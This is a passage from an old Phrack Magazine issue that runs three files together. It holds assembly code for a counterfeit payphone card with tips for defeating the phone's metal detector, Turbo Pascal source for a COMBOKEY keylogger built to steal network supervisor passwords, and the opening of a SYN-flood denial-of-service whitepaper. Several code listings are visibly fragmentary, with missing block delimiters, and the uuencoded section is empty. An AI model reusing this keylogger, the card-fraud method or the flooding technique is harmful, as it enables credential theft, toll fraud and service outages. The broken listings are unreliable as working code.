	bc      CREDIT          ; or greater, then skip to units area
	rrf     TEMP2           ; Rotate TEMP2 one step right
	rrf     TEMP2           ; Rotate TEMP2 one step right
	rrf     TEMP2           ; Rotate TEMP2 one step right
	movlw   0f              ; Load W with $f
	andwf   TEMP2,1         ; And TEMP2 with W register
	movfw   TEMP2           ; Load W with TEMP2
	addlw   0c              ; Add W with $0c
	movwf   FSR             ; Store data address in FSR
	movfw   INDIR           ; Get data byte pointed at by FSR
	movwf   TEMP3           ; Store it in TEMP3
	movlw   07              ; Load W with $07
	andwf   TEMP1,1         ; And TEMP1 with $07
	bz      NO_ROT          ; If result is zero, skip shift loop
ROTLOOP rlf     TEMP3           ; Shift TEMP3 one step left
	decfsz  TEMP1,1         ; Decrement TEMP1 until zero
	goto    ROTLOOP         ; If not zero, repeat until it is!
NO_ROT  btfss   TEMP3,MSB       ; Check if MSB of TEMP3 is set
	bcf     PORTA,CRD_DTA   ; Clear Data Output
	bcf     INTCON,INTF     ; Clear INT Interrupt Flag
	return                  ; Mission Accomplished, return to sender

CREDIT  btfss   PORTB,CRD_WE    ; Check if Card Write Enable is High
	goto    NO_WRT          ; Abort write operation if not...
	btfss   PORTB,CRD_RST   ; Check if Card Reset is High
	goto    NO_WRT          ; Abort write operation if not...
	incf    FUSCNT          ; Increase used-up units counter
	bsf     EE_FLAG,LSB     ; Set EEPROM Write-Flag
	bcf     INTCON,INTF     ; Clear INT Interrupt Flag
	return                  ; Mission Accomplished, return to sender

NO_WRT  movlw   060             ; Load W with $60
	subwf   BITCNT,1        ; Subtract $60 from BITCNT
	movfw   FUSCNT          ; Load W with FUSCNT
	subwf   BITCNT,1        ; Subtract FUSCNT from BITCNT
	bnc     FUSED           ; If result is negative, unit is fused
	bcf     PORTA,CRD_DTA   ; Clear Data Output
FUSED   bcf     INTCON,INTF     ; Clear INT Interrupt Flag
	return                  ; Mission Accomplished, return to sender


<Start of PICREG.EQU>.

; PIC16Cxx Micro-controller Include File

PIC54           equ     0x1ff   ; PIC16C54 Reset Vector
PIC55           equ     0x1ff   ; PIC16C55 Reset Vector
PIC56           equ     0x3ff   ; PIC16C56 Reset Vector
PIC57           equ     0x7ff   ; PIC16C57 Reset Vector
PIC71           equ     0x000   ; PIC16C71 Reset Vector
PIC84           equ     0x000   ; PIC16C84 Reset Vector
INTVEC          equ     0x004   ; PIC16C71/84 Interrupt Vector

INDIR           equ     0x000   ; Indirect File Reg Address Register
RTCC            equ     0x001   ; Real Time Clock Counter
PCL             equ     0x002   ; Program Counter Low Byte
STATUS          equ     0x003   ; Status Register
FSR             equ     0x004   ; File Select Register
PORTA           equ     0x005   ; Port A I/O Register
PORTB           equ     0x006   ; Port B I/O Register
PORTC           equ     0x007   ; Port C I/O Register
ADCON0          equ     0x008   ; PIC16C71 A/D Control Reg 0
ADRES           equ     0x009   ; PIC16C71 A/D Converter Result Register
EEDATA          equ     0x008   ; PIC16C84 EEPROM Data Register
EEADR           equ     0x009   ; PIC16C84 EEPROM Address Register
PCLATH          equ     0x00a   ; Program Counter High Bits
INTCON          equ     0x00b   ; Interrupt Control Register
TRISA           equ     0x005   ; Port A I/O Direction Register
TRISB           equ     0x006   ; Port B I/O Direction Register
TRISC           equ     0x007   ; Port C I/O Direction Register
ADCON1          equ     0x008   ; PIC16C71 A/D Control Reg 1
EECON1          equ     0x008   ; PIC16C84 EEPROM Control Reg. 1
EECON2          equ     0x009   ; PIC16C84 EEPROM Control Reg. 2
OPTION          equ     0x001   ; Option Register

MSB             equ     0x007   ; Most-Significant Bit
LSB             equ     0x000   ; Least-Significant Bit
TRUE            equ     1
YES             equ     1
FALSE           equ     0
NO              equ     0

; Status Register (f03) Bits

CARRY           equ     0x000   ; Carry Bit
C               equ     0x000   ; Carry Bit
DCARRY          equ     0x001   ; Digit Carry Bit
DC              equ     0x001   ; Digit Carry Bit
Z_BIT           equ     0x002   ; Zero Bit
Z               equ     0x002   ; Zero Bit
P_DOWN          equ     0x003   ; Power Down Bit
PD              equ     0x003   ; Power Down Bit
T_OUT           equ     0x004   ; Watchdog Time-Out Bit
TO              equ     0x004   ; Watchdog Time-Out Bit
RP0             equ     0x005   ; Register Page Select 0
RP1             equ     0x006   ; Register Page Select 1
IRP             equ     0x007   ; Indirect Addressing Reg. Page Sel.

; INTCON Register (f0b) Bits

RBIF            equ     0x000   ; RB Port change interrupt flag
INTF            equ     0x001   ; INT Interrupt Flag
RTIF            equ     0x002   ; RTCC Overflow Interrupt Flag
RBIE            equ     0x003   ; RB Port Ch. Interrupt Enable
INTE            equ     0x004   ; INT Interrupt Enable
RTIE            equ     0x005   ; RTCC Overflow Int. Enable
ADIE            equ     0x006   ; PIC16C71 A/D Int. Enable
EEIE            equ     0x006   ; PIC16C84 EEPROM Write Int. Enable
GIE             equ     0x007   ; Global Interrupt Enable

; OPTION Register (f81) Bits

PS0             equ     0x000   ; Prescaler Bit 0
PS1             equ     0x001   ; Prescaler Bit 1
PS2             equ     0x002   ; Prescaler Bit 2
PSA             equ     0x003   ; Prescaler Assignment Bit
RTE             equ     0x004   ; RTCC Signal Edge Select
RTS             equ     0x005   ; RTCC Signal Source Select
INTEDG          equ     0x006   ; Interrupt Edge Select
RBPU            equ     0x007   ; Port B Pull-up Enable

; ADCON0 Register (f08) Bits

ADON            equ     0x000   ; A/D Converter Power Switch
ADIF            equ     0x001   ; A/D Conversion Interrupt Flag
ADGO            equ     0x002   ; A/D Conversion Start Flag
CHS0            equ     0x003   ; A/D Converter Channel Select 0
CHS1            equ     0x004   ; A/D Converter Channel Select 1
ADCS0           equ     0x006   ; A/D Conversion Clock Select 0
ADCS1           equ     0x007   ; A/D Conversion Clock Select 0

; ADCON1 Register (f88) Bits

PCFG0           equ     0x000   ; RA0-RA3 Configuration Bit 0
PCFG1           equ     0x001   ; RA0-RA3 Configuration Bit 0

; EECON1 Register (f88) Bits

RD              equ     0x000   ; PIC16C84 EEPROM Read Data Flag
WR              equ     0x001   ; PIC16C84 EEPROM Write Data Flag
WREN            equ     0x002   ; PIC16C84 EEPROM Write Enable Flag
WRERR           equ     0x003   ; PIC16C84 EEPROM Write Error Flag
EEIF            equ     0x004   ; PIC16C84 EEPROM Interrupt Flag

; Some useful macros...

PUSH    macro
	movwf   TEMP_W
	swapf   STATUS,W
	movwf   TEMP_S

POP     macro
	swapf   TEMP_S,W
	movwf   STATUS
	swapf   TEMP_W
	swapf   TEMP_W,W


<End of PICREG.EQU>.

The Security System:
The security of the Schlumberger card system depends strongly on two
things: the metal detector in the card reader which senses if there is
any metal on the card where there shouldn't be any metal. Circuit traces
on a home built card is definitively made of metal. So, we have to
figure out a way of getting around this problem... Well, that isn't
really too hard! They made one really big mistake: If the metal detector
is grounded, it doesn't work!! If you look at the printout of my layouts
for this card you'll find one big area of the board that is rectangle
shaped. In this area you should make a big blob of solder that is
between 2-3 millimeters high (approximately!). When the card slides into
the phone, the blob should be touching the metal detector and since the
blob is connected to ground the detector is also being grounded. The
phone also counts the number of times the metal detector gets triggered
by foreign objects in the card reader (Meaning that the phone companies
security staff can see if someone's attempting to use a fake card that
doesn't have this counter-measure on it!) and this is of course included
in the daily service report the phone sends to the central computer.

The second security lies in the cards first 12 bytes, it's not just what
it appears to be: a serial number, it's more than that. Part of the
first byte is a checksum of the number of 1's in the 11 bytes following
it. Then byte 2 is always $83, identifying the card as an electronic
phonecard. Byte 3 and 4 is the number of units on the card: The first
nibble of byte 3 is always $1 and then in the remaining three nibbles
the number of units is stored in BCD code, for example $11,$22 means 120
units (Two units is always fused at the factory as a test, see the text
by Stephane Bausson!) Then we have 4 bytes of card serial number data, 2
bytes of card checksum (calculated with a 16 bit key stored in the
payphone's ROM), 1 byte that is always $11, and then at last, byte 12
which is the country identifier.

The Parts Needed:
	01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package)
	01 * 4 MHz Ceramic Resonator, Surface Mounted
	02 * 22 pF Capacitors, Surface Mounted (Size 1206).
	01 * 0.8mm thick single sided circuit board with P20 photoresist

The Construction:
Since this project is obviously not intended for the novice in
electronics I will not go into the basic details of soldering/etching
circuit boards. If you do not know much of this, ask a friend who does
for help. If you want to reach me for help, write to Phrack and ask them
to forward the letter to me as I wish to remain anonymous - This project
will probably upset a lot of phone companies and last but not least the
guys at Schlumberger Tech.

The UUEncoded Part:
In this part of the phile you will find circuit board layouts for Tango
PCB as well as HP LaserJet binary files which will output the layout
when printed from DOS with the PRINT command.

You will also find another version of the source code to use if your PIC
programmer can't handle the programming of the 64 byte Data EEPROM

<UUEncoded Part Begins Here>.

section 1 of uuencode 5.22 of file    by R.E.M.

begin 644
sum -r/size 61640/45861 section (from "begin" to "end")
sum -r/size 58373/33263 entire input file

<UUEncoded Part Ends Here!>.


                              ==Phrack Magazine==

                 Volume Seven, Issue Forty-Eight, File 12 of 18

                COMBOKEY and the Simplistic Art of PC Hacking
                              KeyTrap Revisited

                                  by Sendai
                         (with apologies to Dcypher)

NOTE: Of course I take no responsibility when you use this and get
kicked out of school or something stupid.  Besides, why would you be so
stupid as to get caught in the first place? :-) So be careful, and have
fun.  Don't get stupid.

* At least a reading knowledge of TurboPascal and 8086 assembly
* A tolerable understanding of how the PC actually works or
* A copy of Queue's "MS-DOS Programmer's Reference"
* A copy of that yellow-spined "Indespensable PC Hardware Reference" book

It was with a little dissatisfaction that I read Dcypher's KeyTrap
article the other day (so I'm back-logged a few issues, so sue me!)
I've been foolin' around with a version of this that I first wrote about
five years ago during high school, and well, I thought mine was a little
easier to understand.

So I'm gonna show you my version, actually explain how the damn thing
works, and hope somebody out there has their day brightened by using
this program.

Note that the only reason I wrote this thing was to record passwords on
a Novell net. It will record all keypresses, but it really has limited
use other than hacking.

Fun fact: With this program, it has taken me an average of about six
hours to snag supervisor on every Novell net I've nailed.  And I'm sure
you can do better. ;-)

Okay, a quick review for those PC newbies out there.  When a key is
pressed on a PC, it generates an interrupt 9 (keyboard interrupt),
causing the machine to look up the address of the 9th Interrupt Service
Routine. The ISR is typically in ROM; the interrupt vector itself is

A key recorder is a program that simply latches itself into the
interrupt 9 handler by replacing the old vector with its own address.
By doing this, every time a key is pressed, we know about it.

ENTER COMBOKEY (That'd be the key recorder)
I differ with my strategy from Dcypher in that I don't bother going
directly to the keybard hardware.  COMBOKEY just goes ahead and calls
the old ISR and then looks in the BIOS keyboard buffer to see what the
key was. Yeah, you don't get the funky-ass key combinations like
control-shift-right-alt-F2-Z, but hey, I'm just after the passwords.

When a new key is pressed, it's dumped in the buffer.  When the buffer
is full, nothing happens.  I'll leave writing it to a file as an
exercise to the reader.

My favorite feature, if I may say so myself, is the fact that COMBOKEY
has an API in it, sort of.  Interrupt 255 is also latched and provides
the "user" an interface to the presently running copy of COMBOKEY.  But
not just anyone can go poking into 255 to kill COMBOKEY or get a buffer
dump or whatever.  First, you gotta send a combination.

Look at the "const" section of COMBOKEY and you'll see a constant array
of four bytes.  Change these numbers to whatever the hell you want.  To
use the COMBOKEY interface you need to send each of these bytes
sequentially in AX to ISR 255.  Look at the "DoCombo" procedure in Dump
or Kill to see what I mean.

After you send the combo, you send one more byte that represents the

Dump buffer:   AX=C0h    Dumps the buffer to a chunk of memory at ES:DI.
Get info:      AX=C2h    Sends a TinfoRec (see source) to ES:DI.
Kill:          AX=C1h    Deactivates the recorder.

There are two additional programs following: Dump and Kill.  These just
use the interface to do their appropriate actions.

There's a good deal of social engineering involved with using COMBOKEY.
Since it works on only the machine you put it on, you have to know where
to put it in the first place to be most effective.  (Or be really
resourceful and put it on every machine around.)

To maximize your amusement, get the supervisor password first, and then
put this program in the startup sequence of the network.  Then go nuts.

This program gets REALLY fun when your net is equipped with TCP/IP apps
like Telnet, and some moron has their home machine hooked up to the
Net, and they actually log into it  with root from your net.  Instant

If I ever get around to it, it'd be cool to use the IPX interface to
actually broadcast the keystrokes over to a waiting machine for instant

The next trick to try is to maybe build a hardware version of this with
a little microcontroller.  A Motorola 68HC11 would do nicely.  This
would get rid of the pesky problem of reseting the machine or turning
the power off.

Ah well.  Comments and the like to  Happy hunting.

{ Source notes:
  This'll compile on TurboPascal 6 or better.  Might even work with 5.
  Why Turbo?  Cause it generates damn tight code, and it's much more readable
  for the newbies than all assembly. }

{ComboKey - It's a TSR, so we gotta do the mem setup. }
{$M 1024, 0, 2100}
program ComboKey;

uses Dos; { For Keep() }

     DUMP_BUFFER = $C0;
     GET_INFO = $C2;

     BUFSIZE = 2048;     { In bytes, NOT paragraphs! }
     DISPLAY_MAX = 100;
     combo: Array[0..3] of Byte = ( 01, 01, 19, 74 );

     PBuf = ^TBuf;
     TBuf = Array[0..BUFSIZE-1] of Byte;
     PInfoRec = ^TInfoRec;
     TInfoRec = record
          buffer_size: Word;  { Word is 16 bit, unsigned }
          overwrite: Word;
          buffer_ptr: Word;

     old9o, old9s: Word; { Must be in this order! }
     wptr: Word absolute $40:$1c; { Ptr to next avail slot in kbd buffer }
     q_top: Word absolute $40:$80;
     q_bot: Word absolute $40:$82;
     buffer: PBuf;
     buf_ptr: Word;
     overwrite_ctr: Word;
     last_wptr: Word;
     tumbler: Byte; { How many numbers in the combo right so far? }

procedure SetVector( int: Byte; s, o: Word);
               push ds
               mov  ah, 25h
               mov  al, int
               mov  ds, s
               mov  dx, o
               int  21h
               pop  ds

procedure NewInt09(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word);
          offset: Word;
          c: Byte;
          l: Word;
          ctr: Word;
          { First call the old handler.  Do the pushf,  cause this is an
            interrupt handler. }
               call dword ptr [old9o]   { Since old9s is next, it works }

          { This isn't a press, but a release - ignore it. }
          if last_wptr = wptr then Exit;


          { Did the queue just wrap? }
          if (wptr = q_top) then offset:=q_bot-2
          else offset:=wptr-2;

          if (buf_ptr = BUFSIZE) then begin { we'd write it, but oh well. }



{ Here's the interface system.  Don't bother saving the old $FF,
cause who uses it anyway?! }
procedure NewIntFF(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word);
          command: Word;
          res, rdi: Word;
          infoptr: PInfoRec;
          l: Word;

          if tumbler=4 then begin  { we have a winner... }

               case command of
                    DUMP_BUFFER: begin
                                   push ds
                              mov  cx, BUFSIZE
                              mov  es, [res]
                              mov  di, [rdi]
                              mov  ax, [WORD PTR buffer+2]
                              mov  ds, ax
                              mov  ax, [WORD PTR buffer]
                              mov  si, ax

                              rep  movsb
                              pop  ds

                    KILL_RECORDER: begin
                         SetVector(9, old9s, old9o);

                    GET_INFO: begin
                              mov  es, [res]
                              mov  di, [rdi]
                              mov  ax, BUFSIZE
                              mov  es:[di], ax
                              mov  ax, [overwrite_ctr]
                              mov  es:[di+2], ax
                              mov  ax, [buf_ptr]
                              mov  es:[di+4], ax


          if command=combo[tumbler] then Inc(tumbler)
          else tumbler:=0;

          mov  ah, $35
          mov  al, 9
          int  $21

          mov  ax, es
          mov  old9s, ax
          mov  old9o, bx

     SetVector(9, Seg(NewInt09), Ofs(NewInt09));
     SetVector(255, Seg(NewIntFF), Ofs(NewIntFF));




{ Kills the keyrecorder }
program Kill;

     combo0 = 01;
     combo1 = 01;
     combo2 = 19;
     combo3 = 74;


procedure ResetCombo;
     l: Word;
     for l:=1 to 4 do asm
          mov  ax, 0
         int   $ff

procedure DoCombo;
               mov  ax, combo0
               int  $ff
               mov  ax, combo1
               int  $ff
               mov  ax, combo2
               int  $ff
               mov  ax, combo3
               int  $ff

          mov  ax, KILL_RECORDER
          int  $ff


{ Syntax:

  This'll dump the buffer information and contents to the file.  If 
  no file is given, it goes to the screen. }

program Dump;

     combo0 = 01;
     combo1 = 01;
     combo2 = 19;
     combo3 = 74;

     DUMP_BUFFER = $C0;
     GET_INFO = $C2;

     PInfoRec = ^TInfoRec;
     TInfoRec = record
          buffer_size: Word;
          overwrite: Word;
          buffer_ptr: Word;

     info: TInfoRec;
     buffer: Array[0..8191] of Byte;
     l: Word;
     f: Text;

procedure ResetCombo;
          l: Word;
          for l:=1 to 4 do asm
               mov  ax, 0
               int  $ff

procedure DoCombo;
               mov  ax, combo0
               int  $ff
               mov  ax, combo1
               int  $ff
               mov  ax, combo2
               int  $ff
               mov  ax, combo3
               int  $ff

   Assign(f, ParamStr(1));


          mov  ax, SEG info
          mov  es, ax
          mov  di, OFFSET info
          mov  ax, GET_INFO
          int  $ff

     writeln(f,'Buffer size: ',info.buffer_size);
     writeln(f,'Buffer ptr:  ',info.buffer_ptr);
     writeln(f,'Overwrite:   ',info.overwrite);

          mov  ax, SEG buffer
          mov  es, ax
          mov  di, OFFSET buffer
          mov  ax, DUMP_BUFFER
          int  $ff

     for l:=0 to info.buffer_ptr do begin
          write(f, Char(buffer[l]));
          if buffer[l] = 13 then write(f,#10);


                            ==Phrack Magazine==

             Volume Seven, Issue Forty-Eight, File 13 of 18

			     [ Project Neptune ]

			by daemon9 / route / infinity
			     for Phrack Magazine
		      July 1996 Guild Productions, kid

		       comments to

	This project is a comprehensive analysis of TCP SYN flooding.  You 
may be wondering, why such a copious treatment of TCP SYN flooding?  
Apparently, someone had to do it.  That someone turned out to be me (I need
a real hobby).  The SYNflood Project consists of this whitepaper, including 
anotated network monitor dumps and fully functional robust Linux sourcecode.

		--[ Introduction ]--

	TCP SYN flooding is a denial of service (DOS) attack.  Like most DOS
attacks, it does not exploit a software bug, but rather a shortcoming in the
implemenation of a particular protocol.  For example, mail bombing DOS attacks
work because most SMTP agents are dumb and will accept whatever is sent their 
way.  ICMP_ECHO floods exploit the fact that most kernels will simply reply to
ICMP_ECHO request packets one after another, ad inifintum.  We will see that
TCP SYN flood DOS attacks work because of the current implementation of TCP's
connection establishment protocol.

		--[ Overview  ]--

	This whitepaper is intended as a complete introduction to TCP SYN 
flooding (refered to hereafter as SYN flooding).  It will cover the attack
in detail, including all relevant necessary background information.  It is 
organized into sections:

	Section I.	TCP Background Information
	Section II.	TCP Memory Structures and the Backlog
	Section III.	TCP Input Processing
	Section IV.	The Attack
	Section V.	Network Trace
	Section VI.	Neptune.c
	Section VII.	Discussion and Prevention
	Section VIII.	References

(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first

         	--[ The Players ]--

                A:      Target host
                X:      Unreachable host 
                Z:      Attacking host
	     Z(x):	Attacker masquerading as the unreachable

                --[ The Figures ]--

                There are a few network transaction  figures in the paper and
they are to be interpreted as per the following example:

       tick   host a      control     host b

	A unit of time.  There is no distinction made as to *how* much time 
passes between ticks, just that time passes.  It's generally not going to be
a great deal. 
host a: 
	A machine particpating in a TCP-based conversation.
	This field shows any relevant control bits set in the TCP header and 
the direction the data is flowing
host b: 
	A machine particpating in a TCP-based conversation.

For example:

        1       A       ---SYN--->      B       

	In this case, at the first refrenced point in time, host a is sending
a TCP segment to host b with the SYN bit on.  Unless stated, we are generally 
not concerned with the data portion of the TCP segment.

		Section I.	TCP Background Information

	TCP is a connection-oriented, reliable transport protocol.  TCP is
responsible for hiding network intricacies from the upper layers.  A 
connection-oriented protcol implies that the two hosts participating in a 
discussion must first establish a connection before data may be exchanged.  In
TCP's case, this is done with the three-way handshake.  Reliability can be 
provided in a number of ways, but the only two we are concerned with are data 
sequencing and acknowledgement.  TCP assigns sequence numbers to every byte in
every segment and acknowledges all data bytes recieved from the other end.  
(ACK's consume a sequence number, but are not themselves ACK'd.  That would be

                --[ TCP Connection Establishment ]--

 	In order to exchange data using TCP, hosts must establish a connection.
TCP establishes a connection in a 3 step process called the 3-way handshake.
If machine A is running a client program and wishes to conect to a server
program on machine B, the process is as follows:

        1       A       ---SYN--->      B       

        2       A    <---SYN/ACK---     B

        3       A       ---ACK--->      B

	At (1) the client is telling the server that it wants a connection.
This is the SYN flag's only purpose.  The client is telling the server that 
the sequence number field is valid, and should be checked.  The client will 
set the sequence number field in the TCP header to it's ISN (initial sequence
number).  The server, upon receiving this segment (2) will respond with it's 
own ISN (therefore the SYN flag is on) and an ACKnowledgement of the clients 
first segment (which is the client's ISN+1).  The client then ACK's the 
server's ISN (3).  Now data transfer may take place.

              --[ TCP Control Flags  ]--

	There are six TCP control flags.  We are only concerned with 3, but 
the others are included for posterity:

*SYN:	Synchronize Sequence Numbers
	The synchronize sequence numbers field is valid.  This flag is only 
valid during the 3-way handshake.  It tells the receiving TCP to check the 
sequence number field, and note it's value as the connection-initiator's 
(usually the client) initial sequence number.  TCP sequence numbers can 
simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295.
Every byte of data exchanged across a TCP connection (along with certain 
flags) is sequenced.  The sequence number field in the TCP header will contain
the sequence number of the *first* byte of data in the TCP segment.  

*ACK:	Acknowledgement
	The acknowledgement number field is valid.  This flag is almost always
set.   The acknowledgement number field in the TCP header holds the value of 
the next *expected* sequence number (from the other side), and also 
acknowledges *all* data (from the other side) up through this ACK number minus

*RST:	Reset
	Destroy the referenced connection.  All memory structures are torn 

URG:	Urgent 
	The urgent pointer is valid.  This is TCP's way of implementing out
of band (OOB) data.  For instance, in a telnet connection a `ctrl-c` on the 
client side is considered urgent and will cause this flag to be set. 

PSH:	Push
	The receiving TCP should not queue this data, but rather pass it to 
the application as soon as possible.  This flag should always be set in 
interactive connections, such as telnet and rlogin.

FIN:	Finish 
	The sending TCP is finished transmitting data, but is still open to 
accepting data.

                --[ Ports ]--
	To grant simultaneous access to the TCP module, TCP provides a user 
interface called a port.  Ports are used by the kernel to identify network 
processes.  They are strictly transport layer entities.  Together with an 
IP address, a TCP port provides provides an endpoint for network 
communications.  In fact, at any given moment *all* Internet connections can 
be described by 4 numbers: the source IP address and source port and the 
destination IP address and destination port.  Servers are bound to 
'well-known' ports so that they may be located on a standard port on 
different systems.  For example, the telnet daemon sits on TCP port 23.

		Section II.	TCP Memory Structures and the Backlog


	For a copius treatment of the topic of SYN flooding, it is necessary
to look at the memory structures that TCP creates when a client SYN arrives
and the connection is pending (that is, a connection that is somewhere in 
the process of the three-way handshake and TCP is in the SYN_SENT or 
SYN_RVCD state).

		--[ BSD ]--		

	Under BSD style network code, for any given pending TCP connection 
there are three memory structures that are allocated (we do not discuss the 
process (proc) structure and file structure, but the reader should be aware 
that they exist as well.):

Socket Structure (socket{}): 	
	Holds the information related to the local end of the communications 
link: protocol used, state information, addressing information, connection 
queues, buffers, and flags.

Internet Protocol Control Block Structure (inpcb{}):
	PCB's are used at the transport layer by TCP (and UDP) to hold various
pieces of information needed by TCP.  They hold: TCP state information, IP 
address information, port numbers, IP header prototype and options and a 
pointer to the routing table entry for the destination address.  PCB's are 
created for a given TCP based server when the server calls listen(),

TCP Control Block Structure (tcpcb{}):
	The TCP control block contains TCP specific information such as timer
information, sequence number information, flow control status, and OOB data.

		--[ Linux ]--

	Linux uses a different scheme of memory allocation to hold network
information.  The socket structure is still used, but instead of the pcb{} 
and tcpcb{}, we have:

Sock Structure (sock{}):
	Protocol specific information, most of the data structures are TCP
related.  This is a huge structure.

SK Structure (sk_buff{}):
	Holds more protocol specific information including packet header 
information, also contains a sock{}.

According to Alan Cox:
	The inode is the inode holding the socket (this may be a dummy inode 
for non file system sockets like IP), the socket holds generic high level
methods and the struct sock is the protocol specific object, although all but 
a few experimental high performance items use the same generic struct sock and
support code. That holds chains of linear buffers (struct sk_buff's).

[ struct inode -> struct socket -> struct sock -> chains of sk_buff's ]

		--[ The Backlog Queue]--

	These are large memory structures.  Every time a client SYN arrives
on a valid port (a port where a TCP server is listen()ing), they must be 
allocated.  If there were no limit, a busy host could easily exhuast all of
it's memory just trying to process TCP connections.  (This would be an even
simpler DOS attack.)  However, there is an upper limit to amount of 
concurrent connection requests a given TCP can have outstanding for a 
given socket.  This limit is the backlog and it is the length of the queue
where incoming (as yet incomplete) connections are kept.  This queue limit 
applies to both the number of imcomplete connections (the 3-way handshake has
not been completed) and the number of completed connections that have not 
been pulled from the queue by the application by way of the accept() call.
If this backlog limit is reached, we will see that TCP will silently 
discard all incoming connection requests until the pending connections can 
be dealt with.  
	The backlog is not a large value.  It does not have to be.  Normally
TCP is quite expedient in connection establishment processing.  Even if a
connection arrived while the queue was full, in all likelyhood, when the
client retransmits it's connection request segment, the receiving TCP will
have room again in it's queue.  Different TCP implementations have different
backlog sizes.   Under BSD style networking code, there is also 'grace' margin 
of 3/2.  That is, TCP will allow up to backlog*3/2+1 connections.  This will
allow a socket one connection even if it calls listen with a backlog of 0.  
Some common backlog values:

   OS		Backlog	  BL+Grace  Notes	
SunOS 4.x.x:	 5    	     8 
IRIX 5.2:	 5	     8
Linux 1.2.x: 	10	    10   Linux does not have this grace margin.
FreeBSD 2.1.0:  	    32
FreeBSD 2.1.5:		   128
Win NTs 3.5.1:	 6	     6   NT does not appear to have this margin.
Win NTw 4.0:	 6	     6   NT has a pathetic backlog.

		Section III.	TCP Input Processing

	To see exactly where the attack works it is necessary to watch as 
the receiving TCP processes an incoming segment.  The following is true for
BSD style networking, and only processes relevant to this paper are 

A packet arrives and is demultiplexed up the protocol stack to TCP.  The TCP
state is LISTEN:

Get header information:
	TCP retrieves the TCP and IP headers and stores the information in
Verify the TCP checksum:
	The standard Internet checksum is applied to the segment.  If it 
fails, no ACK is sent, and the segment is dropped, assuming the client will
retranmit it.
Locate the PCB{}:
	TCP locates the pcb{} associated with the connection.  If it is not
found, TCP drops the segment and sends a RST.  (Aside: This is how TCP
handles connections that arrive on ports with no server listen()ing.)  If
the PCB{} exists, but the state is CLOSED, the server has not called 
connect() or listen().  The segment is dropped, but no RST is sent.  The
client is expected to retransmit it's connection request.  We will see this
occurence when we discuss the 'Linux Anomaly'.
Create new socket:
	When a segment arrives for a listen()ing socket, a slave socket is
created.  This is where a socket{}, tcpcb{}, and another pcb{} are created.
TCP is not committed to the connection at this point, so a flag is set to
cause TCP to drop the socket (and destroy the memory structures) if an
error is encountered.  If the backlog limit is reached, TCP considers this 
an error, and the connection is refused.  We will see that this is exactly 
why the attack works.	Otherwise, the new socket's TCP state is LISTEN, and
the completion of the passive open is attempted.
Drop if RST, ACK, or no SYN:
	If the segment contains a RST, it is dropped.  If it contains an
ACK, it is dropped, a RST is sent and the memory structures torn down (the
ACK makes no sense for the connection at this point, and is considered an
error).  If the segment does not have the SYN bit on, it is dropped.  If
the segment contains a SYN, processing continues.
Address processing, etc:
	TCP then gets the clients address information into a buffer and 
connects it's pcb{} to the client, processes any TCP options, and 
initializes it's initial send sequence (ISS) number.
ACK the SYN:
	TCP sends a SYN, ISS and an ACK to the client.  The connection
establishment timer is set for 75 seconds at this point. The state changes 
to SYN_RCVD.  Now. TCP is commited to the socket.  We will see that this 
is state the target TCP will be in when in the throes of the attack because
the expected client response is never received.  The state remains SYN_RCVD
until the connection establishment timer expires, in which case the all the 
memory structures associated with the connection are destroyed, and the
socket returns to the LISTEN state.


		Section IV.	The Attack

	A TCP connection is initiated with a client issuing a request to a 
server with the SYN flag on in the TCP header.  Normally the server will 
issue a SYN/ACK back to the client identified by the 32-bit source address in 
the IP header.  The client will then send an ACK to the server (as we 
saw in figure 1 above) and data transfer can commence.  When the client IP 
address is spoofed to be that of an unreachable, host, however, the targetted
TCP cannot complete the 3-way handshake and will keep trying until it times 
out.  That is the basis for the attack.
	The attacking host sends a few (we saw that as little as 6 is 
enough) SYN requests to the target TCP port (for example, the telnet daemon).
The attacking host also must make sure that the source IP-address is spoofed 
to be that of another, currently unreachable host (the target TCP will be 
sending it's response to this address).  IP (by way of ICMP) will inform TCP 
that the host is unreachable, but TCP considers these errors to be transient 
and leaves the resolution of them up to IP (reroute the packets, etc) 
effectively ignoring them.  The IP-address must be unreachable because the 
attacker does not want *any* host to recieve the SYN/ACKs that will be coming 
from the target TCP, which  would elicit a RST from that host (as we saw in
TCP input above).  This would foil the attack.  The process is as follows:


	1	Z(x)    ---SYN--->	A

		Z(x)    ---SYN--->	A

		Z(x)    ---SYN--->	A

		Z(x)    ---SYN--->	A

		Z(x)    ---SYN--->	A

		Z(x)    ---SYN--->	A

	2	X    <---SYN/ACK--- 	A

		X    <---SYN/ACK---	A


	3	X      <---RST---	A

At (1) the attacking host sends a multitude of SYN requests to the target 
to fill it's backlog queue with pending connections.  (2) The target responds
with SYN/ACKs to what it believes is the source of the incoming SYNs.  During
this time all further requests to this TCP port will be ignored.  The target
port is flooded.

		--[ Linux Anomaly ]--

	In doing my research for this project, I noticed a very strange
implementation error in the TCP module of Linux.   When a particular TCP 
server is flooded on a Linux host, strange things are afoot...  First, it 
appears that the connection-establishment timer is broken.  The 10 spoofed 
connection-requests keep the sockets in the SYN_RCVD state for just 
over 20 minutes (23 minutesto be exact.  Wonder what the signifigance of 
this is... Hmmm...).  Much longer than the 75-seconds it *should* be.  The 
next oddity is even more odd... After that seemingly arbitrary time period
(I have to determine what the hell is going on there), TCP moves the flooded
sockets into the CLOSE state, where they *stay* until a connection-request
arrives on a *different* port.  If a connection-request arrives on the 
flooded port (now in the CLOSE state), it will not answer, acting as if it
is still flooded.  After the connection-request arrives on a different port,
the CLOSEd sockets will be destroyed, and the original flooded port will be
free to answer requests again.  It seems as though the connection-request
will spark the CLOSEd sockets into calling listen()...  Damn wierd if you ask
 	The implications of this are severe.  I have been able to completely
disable all TCP based servers from answering requests indefinitely.  If all
the TCP servers are flooded, there are none to recieve the valid connection
request to alleviate the CLOSE state from the flooded connections.  Bad 
news indeed. 
	[Note: as of 7.15.96 this is a conundrum.  I have contacted Alan
Cox and Eric Schenk and plan to work with them on a solution to this 
problem.  I be forthcoming with all our findings as soon as possible.  I 
believe the problem to perhaps lie (at least in part) in the 
tcp_close_pending() function...  Or perhaps there is a logic error in how
TCP switches between the connection-establishment timer and the 
keep-alive timer.  They are both implemented using the same variable since
they are mutally exclusive...]


		Section V.	Network Trace


	The following is a network trace from an actual SYN flooding session.
The target machine is Ash, a Linux 1.2.13 box.  The attacker is Onyx.  The
network is a 10Mbps ethernet.
